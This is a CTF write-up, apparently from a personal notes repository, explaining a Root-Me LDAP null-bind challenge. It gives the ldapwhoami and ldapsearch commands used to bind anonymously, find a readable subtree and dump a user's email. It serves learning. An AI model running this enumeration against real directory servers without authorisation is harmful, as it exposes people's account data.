tudattr/ctf-notes
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
de25173927f8eb394dd6b07def3fca5b271ff0a5
ctf-notes/network/lda-null-bind/explaination.org
Tuan-Dat Tran de25173927 feat ldap-null-bind 
Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
2026-03-21 13:54:37 +01:00

82 lines
2.2 KiB
Org Mode
Raw Blame History

* LDAP null-bind challenge explained simply
Think of LDAP like a big company phonebook/tree.
Each node in the tree is a folder or a person record:
#+begin_example
dc=challenge01,dc=root-me,dc=org
|
+-- ou=anonymous
|
+-- uid=sabu
+-- mail: sabu@anonops.org
#+end_example
In this challenge, the server allows *anonymous login* (called a null bind).
That means we can connect without a username/password and ask some questions.
** What we did (step by step)
1) Checked if anonymous access works
#+begin_src bash
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
#+end_src
It returned `anonymous`, so null bind is enabled.
2) Tried to list everything from the main base DN
#+begin_src bash
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
#+end_src
Server replied with `Insufficient access`.
So: anonymous is allowed, but not everywhere.
3) Probed likely child branches under the base DN
We tested candidate DNs and found one readable branch:
#+begin_src bash
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
#+end_src
That confirmed `ou=anonymous` exists and is accessible.
4) Enumerated that readable branch
#+begin_src bash
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
#+end_src
This returned a user record:
- `uid=sabu`
- `mail: sabu@anonops.org`
So the requested email is:
*sabu@anonops.org*
** Why this works
- LDAP permissions are often set per branch (subtree).
- Root/base queries may be blocked.
- A specific subtree can still be world-readable.
- Enumeration is about finding *where* read access is allowed.
** Tiny mental model
#+begin_example
[Connect anonymously] --> [Test base DN] --blocked--> [Try child branches]
|
v
[Find readable subtree]
|
v
[Dump entries + get mail]
#+end_example
Reference in New Issue View Git Blame Copy Permalink